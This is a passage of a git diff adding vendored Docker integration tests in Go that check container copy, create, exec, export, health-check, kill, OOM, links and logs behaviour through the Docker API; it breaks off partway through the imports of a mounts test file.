b/vendor/github.com/docker/docker/integration/container/copy_test.go @@ -0,0 +1,65 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "fmt" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestCopyFromContainerPathDoesNotExist(t *testing.T) { + defer setupTest(t)() + + ctx := context.Background() + apiclient := testEnv.APIClient() + cid := container.Create(t, ctx, apiclient) + + _, _, err := apiclient.CopyFromContainer(ctx, cid, "/dne") + assert.Check(t, client.IsErrNotFound(err)) + expected := fmt.Sprintf("No such container:path: %s:%s", cid, "/dne") + assert.Check(t, is.ErrorContains(err, expected)) +} + +func TestCopyFromContainerPathIsNotDir(t *testing.T) { + defer setupTest(t)() + skip.If(t, testEnv.OSType == "windows") + + ctx := context.Background() + apiclient := testEnv.APIClient() + cid := container.Create(t, ctx, apiclient) + + _, _, err := apiclient.CopyFromContainer(ctx, cid, "/etc/passwd/") + assert.Assert(t, is.ErrorContains(err, "not a directory")) +} + +func TestCopyToContainerPathDoesNotExist(t *testing.T) { + defer setupTest(t)() + skip.If(t, testEnv.OSType == "windows") + + ctx := context.Background() + apiclient := testEnv.APIClient() + cid := container.Create(t, ctx, apiclient) + + err := apiclient.CopyToContainer(ctx, cid, "/dne", nil, types.CopyToContainerOptions{}) + assert.Check(t, client.IsErrNotFound(err)) + expected := fmt.Sprintf("No such container:path: %s:%s", cid, "/dne") + assert.Check(t, is.ErrorContains(err, expected)) +} + +func TestCopyToContainerPathIsNotDir(t *testing.T) { + defer setupTest(t)() + skip.If(t, testEnv.OSType == "windows") + + ctx := context.Background() + apiclient := testEnv.APIClient() + cid := container.Create(t, ctx, apiclient) + + err := 
apiclient.CopyToContainer(ctx, cid, "/etc/passwd/", nil, types.CopyToContainerOptions{}) + assert.Assert(t, is.ErrorContains(err, "not a directory")) +} diff --git a/vendor/github.com/docker/docker/integration/container/create_test.go b/vendor/github.com/docker/docker/integration/container/create_test.go new file mode 100644 index 0000000000..f94eb4a3fb --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/create_test.go @@ -0,0 +1,303 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "encoding/json" + "fmt" + "strconv" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/network" + ctr "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/oci" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestCreateFailsWhenIdentifierDoesNotExist(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + + testCases := []struct { + doc string + image string + expectedError string + }{ + { + doc: "image and tag", + image: "test456:v1", + expectedError: "No such image: test456:v1", + }, + { + doc: "image no tag", + image: "test456", + expectedError: "No such image: test456", + }, + { + doc: "digest", + image: "sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa", + expectedError: "No such image: sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa", + }, + } + + for _, tc := range testCases { + tc := tc + t.Run(tc.doc, func(t *testing.T) { + t.Parallel() + _, err := client.ContainerCreate(context.Background(), + &container.Config{Image: tc.image}, + &container.HostConfig{}, + &network.NetworkingConfig{}, + "", + ) + assert.Check(t, is.ErrorContains(err, tc.expectedError)) + }) + } +} + +func 
TestCreateWithInvalidEnv(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + + testCases := []struct { + env string + expectedError string + }{ + { + env: "", + expectedError: "invalid environment variable:", + }, + { + env: "=", + expectedError: "invalid environment variable: =", + }, + { + env: "=foo", + expectedError: "invalid environment variable: =foo", + }, + } + + for index, tc := range testCases { + tc := tc + t.Run(strconv.Itoa(index), func(t *testing.T) { + t.Parallel() + _, err := client.ContainerCreate(context.Background(), + &container.Config{ + Image: "busybox", + Env: []string{tc.env}, + }, + &container.HostConfig{}, + &network.NetworkingConfig{}, + "", + ) + assert.Check(t, is.ErrorContains(err, tc.expectedError)) + }) + } +} + +// Test case for #30166 (target was not validated) +func TestCreateTmpfsMountsTarget(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + client := request.NewAPIClient(t) + + testCases := []struct { + target string + expectedError string + }{ + { + target: ".", + expectedError: "mount path must be absolute", + }, + { + target: "foo", + expectedError: "mount path must be absolute", + }, + { + target: "/", + expectedError: "destination can't be '/'", + }, + { + target: "//", + expectedError: "destination can't be '/'", + }, + } + + for _, tc := range testCases { + _, err := client.ContainerCreate(context.Background(), + &container.Config{ + Image: "busybox", + }, + &container.HostConfig{ + Tmpfs: map[string]string{tc.target: ""}, + }, + &network.NetworkingConfig{}, + "", + ) + assert.Check(t, is.ErrorContains(err, tc.expectedError)) + } +} +func TestCreateWithCustomMaskedPaths(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + testCases := []struct { + maskedPaths []string + expected []string + }{ + { + maskedPaths: []string{}, + expected: []string{}, 
+ }, + { + maskedPaths: nil, + expected: oci.DefaultSpec().Linux.MaskedPaths, + }, + { + maskedPaths: []string{"/proc/kcore", "/proc/keys"}, + expected: []string{"/proc/kcore", "/proc/keys"}, + }, + } + + checkInspect := func(t *testing.T, ctx context.Context, name string, expected []string) { + _, b, err := client.ContainerInspectWithRaw(ctx, name, false) + assert.NilError(t, err) + + var inspectJSON map[string]interface{} + err = json.Unmarshal(b, &inspectJSON) + assert.NilError(t, err) + + cfg, ok := inspectJSON["HostConfig"].(map[string]interface{}) + assert.Check(t, is.Equal(true, ok), name) + + maskedPaths, ok := cfg["MaskedPaths"].([]interface{}) + assert.Check(t, is.Equal(true, ok), name) + + mps := []string{} + for _, mp := range maskedPaths { + mps = append(mps, mp.(string)) + } + + assert.DeepEqual(t, expected, mps) + } + + for i, tc := range testCases { + name := fmt.Sprintf("create-masked-paths-%d", i) + config := container.Config{ + Image: "busybox", + Cmd: []string{"true"}, + } + hc := container.HostConfig{} + if tc.maskedPaths != nil { + hc.MaskedPaths = tc.maskedPaths + } + + // Create the container. + c, err := client.ContainerCreate(context.Background(), + &config, + &hc, + &network.NetworkingConfig{}, + name, + ) + assert.NilError(t, err) + + checkInspect(t, ctx, name, tc.expected) + + // Start the container. 
+ err = client.ContainerStart(ctx, c.ID, types.ContainerStartOptions{}) + assert.NilError(t, err) + + poll.WaitOn(t, ctr.IsInState(ctx, client, c.ID, "exited"), poll.WithDelay(100*time.Millisecond)) + + checkInspect(t, ctx, name, tc.expected) + } +} + +func TestCreateWithCustomReadonlyPaths(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + testCases := []struct { + doc string + readonlyPaths []string + expected []string + }{ + { + readonlyPaths: []string{}, + expected: []string{}, + }, + { + readonlyPaths: nil, + expected: oci.DefaultSpec().Linux.ReadonlyPaths, + }, + { + readonlyPaths: []string{"/proc/asound", "/proc/bus"}, + expected: []string{"/proc/asound", "/proc/bus"}, + }, + } + + checkInspect := func(t *testing.T, ctx context.Context, name string, expected []string) { + _, b, err := client.ContainerInspectWithRaw(ctx, name, false) + assert.NilError(t, err) + + var inspectJSON map[string]interface{} + err = json.Unmarshal(b, &inspectJSON) + assert.NilError(t, err) + + cfg, ok := inspectJSON["HostConfig"].(map[string]interface{}) + assert.Check(t, is.Equal(true, ok), name) + + readonlyPaths, ok := cfg["ReadonlyPaths"].([]interface{}) + assert.Check(t, is.Equal(true, ok), name) + + rops := []string{} + for _, rop := range readonlyPaths { + rops = append(rops, rop.(string)) + } + assert.DeepEqual(t, expected, rops) + } + + for i, tc := range testCases { + name := fmt.Sprintf("create-readonly-paths-%d", i) + config := container.Config{ + Image: "busybox", + Cmd: []string{"true"}, + } + hc := container.HostConfig{} + if tc.readonlyPaths != nil { + hc.ReadonlyPaths = tc.readonlyPaths + } + + // Create the container. + c, err := client.ContainerCreate(context.Background(), + &config, + &hc, + &network.NetworkingConfig{}, + name, + ) + assert.NilError(t, err) + + checkInspect(t, ctx, name, tc.expected) + + // Start the container. 
+ err = client.ContainerStart(ctx, c.ID, types.ContainerStartOptions{}) + assert.NilError(t, err) + + poll.WaitOn(t, ctr.IsInState(ctx, client, c.ID, "exited"), poll.WithDelay(100*time.Millisecond)) + + checkInspect(t, ctx, name, tc.expected) + } +} diff --git a/vendor/github.com/docker/docker/integration/container/daemon_linux_test.go b/vendor/github.com/docker/docker/integration/container/daemon_linux_test.go new file mode 100644 index 0000000000..bc5c5076b8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/daemon_linux_test.go @@ -0,0 +1,78 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "fmt" + "io/ioutil" + "strconv" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/daemon" + "golang.org/x/sys/unix" + "gotest.tools/assert" + "gotest.tools/skip" +) + +// This is a regression test for #36145 +// It ensures that a container can be started when the daemon was improperly +// shutdown when the daemon is brought back up. +// +// The regression is due to improper error handling preventing a container from +// being restored and as such have the resources cleaned up. +// +// To test this, we need to kill dockerd, then kill both the containerd-shim and +// the container process, then start dockerd back up and attempt to start the +// container again. 
+func TestContainerStartOnDaemonRestart(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot start daemon on remote test run") + t.Parallel() + + d := daemon.New(t) + d.StartWithBusybox(t, "--iptables=false") + defer d.Stop(t) + + client, err := d.NewClient() + assert.Check(t, err, "error creating client") + + ctx := context.Background() + + cID := container.Create(t, ctx, client) + defer client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{Force: true}) + + err = client.ContainerStart(ctx, cID, types.ContainerStartOptions{}) + assert.Check(t, err, "error starting test container") + + inspect, err := client.ContainerInspect(ctx, cID) + assert.Check(t, err, "error getting inspect data") + + ppid := getContainerdShimPid(t, inspect) + + err = d.Kill() + assert.Check(t, err, "failed to kill test daemon") + + err = unix.Kill(inspect.State.Pid, unix.SIGKILL) + assert.Check(t, err, "failed to kill container process") + + err = unix.Kill(ppid, unix.SIGKILL) + assert.Check(t, err, "failed to kill containerd-shim") + + d.Start(t, "--iptables=false") + + err = client.ContainerStart(ctx, cID, types.ContainerStartOptions{}) + assert.Check(t, err, "failed to start test container") +} + +func getContainerdShimPid(t *testing.T, c types.ContainerJSON) int { + statB, err := ioutil.ReadFile(fmt.Sprintf("/proc/%d/stat", c.State.Pid)) + assert.Check(t, err, "error looking up containerd-shim pid") + + // ppid is the 4th entry in `/proc/pid/stat` + ppid, err := strconv.Atoi(strings.Fields(string(statB))[3]) + assert.Check(t, err, "error converting ppid field to int") + + assert.Check(t, ppid != 1, "got unexpected ppid") + return ppid +} diff --git a/vendor/github.com/docker/docker/integration/container/diff_test.go b/vendor/github.com/docker/docker/integration/container/diff_test.go new file mode 100644 index 0000000000..b4219c3627 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/diff_test.go @@ -0,0 +1,42 @@ +package container // import 
"github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/archive" + "gotest.tools/assert" + "gotest.tools/poll" +) + +func TestDiff(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", `mkdir /foo; echo xyzzy > /foo/bar`)) + + // Wait for it to exit as cannot diff a running container on Windows, and + // it will take a few seconds to exit. Also there's no way in Windows to + // differentiate between an Add or a Modify, and all files are under + // a "Files/" prefix. + expected := []containertypes.ContainerChangeResponseItem{ + {Kind: archive.ChangeAdd, Path: "/foo"}, + {Kind: archive.ChangeAdd, Path: "/foo/bar"}, + } + if testEnv.OSType == "windows" { + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond), poll.WithTimeout(60*time.Second)) + expected = []containertypes.ContainerChangeResponseItem{ + {Kind: archive.ChangeModify, Path: "Files/foo"}, + {Kind: archive.ChangeModify, Path: "Files/foo/bar"}, + } + } + + items, err := client.ContainerDiff(ctx, cID) + assert.NilError(t, err) + assert.DeepEqual(t, expected, items) +} diff --git a/vendor/github.com/docker/docker/integration/container/exec_test.go b/vendor/github.com/docker/docker/integration/container/exec_test.go new file mode 100644 index 0000000000..85f9e05915 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/exec_test.go @@ -0,0 +1,50 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "io/ioutil" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/strslice" + 
"github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestExec(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.35"), "broken in earlier versions") + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client, container.WithTty(true), container.WithWorkingDir("/root")) + + id, err := client.ContainerExecCreate(ctx, cID, + types.ExecConfig{ + WorkingDir: "/tmp", + Env: strslice.StrSlice([]string{"FOO=BAR"}), + AttachStdout: true, + Cmd: strslice.StrSlice([]string{"sh", "-c", "env"}), + }, + ) + assert.NilError(t, err) + + resp, err := client.ContainerExecAttach(ctx, id.ID, + types.ExecStartCheck{ + Detach: false, + Tty: false, + }, + ) + assert.NilError(t, err) + defer resp.Close() + r, err := ioutil.ReadAll(resp.Reader) + assert.NilError(t, err) + out := string(r) + assert.NilError(t, err) + assert.Assert(t, is.Contains(out, "PWD=/tmp"), "exec command not running in expected /tmp working directory") + assert.Assert(t, is.Contains(out, "FOO=BAR"), "exec command not running with expected environment variable FOO") +} diff --git a/vendor/github.com/docker/docker/integration/container/export_test.go b/vendor/github.com/docker/docker/integration/container/export_test.go new file mode 100644 index 0000000000..7a9ed0aa99 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/export_test.go @@ -0,0 +1,78 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "encoding/json" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/daemon" + 
"github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/jsonmessage" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +// export a container and try to import it into a new image +func TestExportContainerAndImportImage(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithCmd("true")) + poll.WaitOn(t, container.IsStopped(ctx, client, cID), poll.WithDelay(100*time.Millisecond)) + + reference := "repo/testexp:v1" + exportResp, err := client.ContainerExport(ctx, cID) + assert.NilError(t, err) + importResp, err := client.ImageImport(ctx, types.ImageImportSource{ + Source: exportResp, + SourceName: "-", + }, reference, types.ImageImportOptions{}) + assert.NilError(t, err) + + // If the import is successful, then the message output should contain + // the image ID and match with the output from `docker images`. + + dec := json.NewDecoder(importResp) + var jm jsonmessage.JSONMessage + err = dec.Decode(&jm) + assert.NilError(t, err) + + images, err := client.ImageList(ctx, types.ImageListOptions{ + Filters: filters.NewArgs(filters.Arg("reference", reference)), + }) + assert.NilError(t, err) + assert.Check(t, is.Equal(jm.Status, images[0].ID)) +} + +// TestExportContainerAfterDaemonRestart checks that a container +// created before start of the currently running dockerd +// can be exported (as reported in #36561). To satisfy this +// condition, daemon restart is needed after container creation.
+func TestExportContainerAfterDaemonRestart(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, testEnv.IsRemoteDaemon()) + + d := daemon.New(t) + client, err := d.NewClient() + assert.NilError(t, err) + + d.StartWithBusybox(t) + defer d.Stop(t) + + ctx := context.Background() + ctrID := container.Create(t, ctx, client) + + d.Restart(t) + + _, err = client.ContainerExport(ctx, ctrID) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/integration/container/health_test.go b/vendor/github.com/docker/docker/integration/container/health_test.go new file mode 100644 index 0000000000..7cc196e46d --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/health_test.go @@ -0,0 +1,47 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + "time" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/poll" +) + +// TestHealthCheckWorkdir verifies that health-checks inherit the containers' +// working-dir. 
+func TestHealthCheckWorkdir(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client, container.WithTty(true), container.WithWorkingDir("/foo"), func(c *container.TestContainerConfig) { + c.Config.Healthcheck = &containertypes.HealthConfig{ + Test: []string{"CMD-SHELL", "if [ \"$PWD\" = \"/foo\" ]; then exit 0; else exit 1; fi;"}, + Interval: 50 * time.Millisecond, + Retries: 3, + } + }) + + poll.WaitOn(t, pollForHealthStatus(ctx, client, cID, types.Healthy), poll.WithDelay(100*time.Millisecond)) +} + +func pollForHealthStatus(ctx context.Context, client client.APIClient, containerID string, healthStatus string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + inspect, err := client.ContainerInspect(ctx, containerID) + + switch { + case err != nil: + return poll.Error(err) + case inspect.State.Health.Status == healthStatus: + return poll.Success() + default: + return poll.Continue("waiting for container to become %s", healthStatus) + } + } +} diff --git a/vendor/github.com/docker/docker/integration/container/inspect_test.go b/vendor/github.com/docker/docker/integration/container/inspect_test.go new file mode 100644 index 0000000000..d034c53650 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/inspect_test.go @@ -0,0 +1,48 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "encoding/json" + "testing" + "time" + + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestInspectCpusetInConfigPre120(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux" || !testEnv.DaemonInfo.CPUSet) + + defer setupTest(t)() + client := request.NewAPIClient(t, 
client.WithVersion("1.19")) + ctx := context.Background() + + name := "cpusetinconfig-pre120-" + t.Name() + // Create container with up to-date-API + container.Run(t, ctx, request.NewAPIClient(t), container.WithName(name), + container.WithCmd("true"), + func(c *container.TestContainerConfig) { + c.HostConfig.Resources.CpusetCpus = "0" + }, + ) + poll.WaitOn(t, container.IsInState(ctx, client, name, "exited"), poll.WithDelay(100*time.Millisecond)) + + _, body, err := client.ContainerInspectWithRaw(ctx, name, false) + assert.NilError(t, err) + + var inspectJSON map[string]interface{} + err = json.Unmarshal(body, &inspectJSON) + assert.NilError(t, err, "unable to unmarshal body for version 1.19: %s", err) + + config, ok := inspectJSON["Config"] + assert.Check(t, is.Equal(true, ok), "Unable to find 'Config'") + + cfg := config.(map[string]interface{}) + _, ok = cfg["Cpuset"] + assert.Check(t, is.Equal(true, ok), "API version 1.19 expected to include Cpuset in 'Config'") +} diff --git a/vendor/github.com/docker/docker/integration/container/kill_test.go b/vendor/github.com/docker/docker/integration/container/kill_test.go new file mode 100644 index 0000000000..12a9083cf3 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/kill_test.go @@ -0,0 +1,183 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestKillContainerInvalidSignal(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + id := container.Run(t, ctx, client) + + err := client.ContainerKill(ctx, id, "0") + assert.Error(t, err, "Error response from 
daemon: Invalid signal: 0") + poll.WaitOn(t, container.IsInState(ctx, client, id, "running"), poll.WithDelay(100*time.Millisecond)) + + err = client.ContainerKill(ctx, id, "SIG42") + assert.Error(t, err, "Error response from daemon: Invalid signal: SIG42") + poll.WaitOn(t, container.IsInState(ctx, client, id, "running"), poll.WithDelay(100*time.Millisecond)) +} + +func TestKillContainer(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + + testCases := []struct { + doc string + signal string + status string + }{ + { + doc: "no signal", + signal: "", + status: "exited", + }, + { + doc: "non killing signal", + signal: "SIGWINCH", + status: "running", + }, + { + doc: "killing signal", + signal: "SIGTERM", + status: "exited", + }, + } + + for _, tc := range testCases { + tc := tc + t.Run(tc.doc, func(t *testing.T) { + ctx := context.Background() + id := container.Run(t, ctx, client) + err := client.ContainerKill(ctx, id, tc.signal) + assert.NilError(t, err) + + poll.WaitOn(t, container.IsInState(ctx, client, id, tc.status), poll.WithDelay(100*time.Millisecond)) + }) + } +} + +func TestKillWithStopSignalAndRestartPolicies(t *testing.T) { + skip.If(t, testEnv.OSType != "linux", "Windows only supports 1.25 or later") + defer setupTest(t)() + client := request.NewAPIClient(t) + + testCases := []struct { + doc string + stopsignal string + status string + }{ + { + doc: "same-signal-disables-restart-policy", + stopsignal: "TERM", + status: "exited", + }, + { + doc: "different-signal-keep-restart-policy", + stopsignal: "CONT", + status: "running", + }, + } + + for _, tc := range testCases { + tc := tc + t.Run(tc.doc, func(t *testing.T) { + ctx := context.Background() + id := container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.Config.StopSignal = tc.stopsignal + c.HostConfig.RestartPolicy = containertypes.RestartPolicy{ + Name: "always", + } + }) + err := client.ContainerKill(ctx, id, "TERM") + assert.NilError(t, err) + + 
poll.WaitOn(t, container.IsInState(ctx, client, id, tc.status), poll.WithDelay(100*time.Millisecond)) + }) + } +} + +func TestKillStoppedContainer(t *testing.T) { + skip.If(t, testEnv.OSType != "linux") // Windows only supports 1.25 or later + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + id := container.Create(t, ctx, client) + err := client.ContainerKill(ctx, id, "SIGKILL") + assert.Assert(t, is.ErrorContains(err, "")) + assert.Assert(t, is.Contains(err.Error(), "is not running")) +} + +func TestKillStoppedContainerAPIPre120(t *testing.T) { + skip.If(t, testEnv.OSType != "linux") // Windows only supports 1.25 or later + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t, client.WithVersion("1.19")) + id := container.Create(t, ctx, client) + err := client.ContainerKill(ctx, id, "SIGKILL") + assert.NilError(t, err) +} + +func TestKillDifferentUserContainer(t *testing.T) { + // TODO Windows: Windows does not yet support -u (Feb 2016). 
+ skip.If(t, testEnv.OSType != "linux", "User containers (container.Config.User) are not yet supported on %q platform", testEnv.OSType) + + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t, client.WithVersion("1.19")) + + id := container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.Config.User = "daemon" + }) + poll.WaitOn(t, container.IsInState(ctx, client, id, "running"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerKill(ctx, id, "SIGKILL") + assert.NilError(t, err) + poll.WaitOn(t, container.IsInState(ctx, client, id, "exited"), poll.WithDelay(100*time.Millisecond)) +} + +func TestInspectOomKilledTrue(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux" || !testEnv.DaemonInfo.MemoryLimit || !testEnv.DaemonInfo.SwapLimit) + + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", "x=a; while true; do x=$x$x$x$x; done"), func(c *container.TestContainerConfig) { + c.HostConfig.Resources.Memory = 32 * 1024 * 1024 + }) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(true, inspect.State.OOMKilled)) +} + +func TestInspectOomKilledFalse(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux" || !testEnv.DaemonInfo.MemoryLimit || !testEnv.DaemonInfo.SwapLimit) + + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", "echo hello world")) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(false, inspect.State.OOMKilled)) +} diff --git 
a/vendor/github.com/docker/docker/integration/container/links_linux_test.go b/vendor/github.com/docker/docker/integration/container/links_linux_test.go new file mode 100644 index 0000000000..f9f3cbe5ed --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/links_linux_test.go @@ -0,0 +1,57 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestLinksEtcHostsContentMatch(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + hosts, err := ioutil.ReadFile("/etc/hosts") + skip.If(t, os.IsNotExist(err)) + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithNetworkMode("host")) + res, err := container.Exec(ctx, client, cID, []string{"cat", "/etc/hosts"}) + assert.NilError(t, err) + assert.Assert(t, is.Len(res.Stderr(), 0)) + assert.Equal(t, 0, res.ExitCode) + + assert.Check(t, is.Equal(string(hosts), res.Stdout())) +} + +func TestLinksContainerNames(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + containerA := "first_" + t.Name() + containerB := "second_" + t.Name() + container.Run(t, ctx, client, container.WithName(containerA)) + container.Run(t, ctx, client, container.WithName(containerB), container.WithLinks(containerA+":"+containerA)) + + f := filters.NewArgs(filters.Arg("name", containerA)) + + containers, err := client.ContainerList(ctx, types.ContainerListOptions{ + Filters: f, + }) + assert.NilError(t, err) + assert.Check(t, is.Equal(1, len(containers))) + assert.Check(t, 
is.DeepEqual([]string{"/" + containerA, "/" + containerB + "/" + containerA}, containers[0].Names)) +} diff --git a/vendor/github.com/docker/docker/integration/container/logs_test.go b/vendor/github.com/docker/docker/integration/container/logs_test.go new file mode 100644 index 0000000000..68fbe13a73 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/logs_test.go @@ -0,0 +1,35 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "io/ioutil" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/stdcopy" + "gotest.tools/assert" + "gotest.tools/skip" +) + +// Regression test for #35370 +// Makes sure that when following we don't get an EOF error when there are no logs +func TestLogsFollowTailEmpty(t *testing.T) { + // FIXME(vdemeester) fails on a e2e run on linux... + skip.If(t, testEnv.IsRemoteDaemon()) + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + id := container.Run(t, ctx, client, container.WithCmd("sleep", "100000")) + + logs, err := client.ContainerLogs(ctx, id, types.ContainerLogsOptions{ShowStdout: true, Tail: "2"}) + if logs != nil { + defer logs.Close() + } + assert.Check(t, err) + + _, err = stdcopy.StdCopy(ioutil.Discard, ioutil.Discard, logs) + assert.Check(t, err) +} diff --git a/vendor/github.com/docker/docker/integration/container/main_test.go b/vendor/github.com/docker/docker/integration/container/main_test.go new file mode 100644 index 0000000000..fb87fddcc2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/main_test.go @@ -0,0 +1,33 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m 
*testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/container/mounts_linux_test.go b/vendor/github.com/docker/docker/integration/container/mounts_linux_test.go new file mode 100644 index 0000000000..a0a8836c51 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/mounts_linux_test.go @@ -0,0 +1,208 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "fmt" + "path/filepath" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/client" + 